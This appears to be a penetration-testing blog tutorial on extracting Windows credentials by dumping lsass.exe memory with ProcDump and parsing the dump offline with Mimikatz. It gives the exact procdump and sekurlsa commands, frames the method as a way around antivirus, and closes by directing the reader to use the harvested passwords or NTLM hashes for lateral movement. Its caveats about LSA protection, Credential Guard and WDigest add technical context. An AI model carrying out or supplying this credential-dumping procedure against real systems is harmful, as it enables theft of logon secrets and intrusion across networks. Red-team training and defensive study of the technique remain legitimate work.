Extracting Clear Text Passwords Using Procdump and Mimikatz

Most of us have been in the situation where you want to dump credentials with Mimikatz but antivirus blocks it: you cannot stop or pause the AV, and you cannot add Mimikatz to its exclusion list.

The technique below obtains passwords in clear text from a server without running "malicious" code on it, so there is no antivirus evasion to deal with. The trade-off is that the memory dump itself has to leave the box, and it contains every secret LSASS holds, so handle it like the credential store it is.

To sum up the entire process:
Grab the latest release of Mimikatz from the link below:

ProcDump binary URL:

ProcDump is a signed Microsoft Sysinternals tool, so signature-based antivirus does not flag the binary itself (EDR products that watch for handles opened on lsass.exe with memory-read rights may still alert, and LSA protection, RunAsPPL, denies the open altogether). The goal is to dump the lsass.exe process, which holds the logon credentials, and then feed that dump to mimikatz offline. Whether you get clear-text passwords or only NTLM hashes depends on the target: from Windows 8.1 / Server 2012 R2 onward, WDigest no longer caches the clear-text password unless the registry value HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential is set to 1, and with Credential Guard enabled the domain secrets are isolated away from lsass.exe entirely.

Run cmd.exe with Admin rights.
  • Upload the "Procdump" tool to the server.
  • Dump the memory space of the lsass process to the file lsass.dmp with one of these commands:
C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp ==> For 32-bit systems
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp ==> For 64-bit systems
    (-ma writes a full memory dump, which sekurlsa needs; -64 only changes the output for a 32-bit (WOW64) process, and lsass is a native 64-bit process on 64-bit Windows, so either command yields a 64-bit dump there.)
  • Download the generated lsass.dmp from the server to your own machine.
  • Launch mimikatz against the lsass.dmp file with the commands:
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords full

Keep in mind that for this to work, the mimikatz build you run must match the architecture of the dump (x64 mimikatz for a 64-bit lsass dump, x86 mimikatz for a 32-bit one), and parsing the dump on the same Windows generation as the target avoids version mismatches when sekurlsa walks the LSASS structures. Graphically, the author of mimikatz has generated a compatibility chart:


Now use these passwords (or the NTLM hashes, where no clear text was cached) for lateral movement across the network.
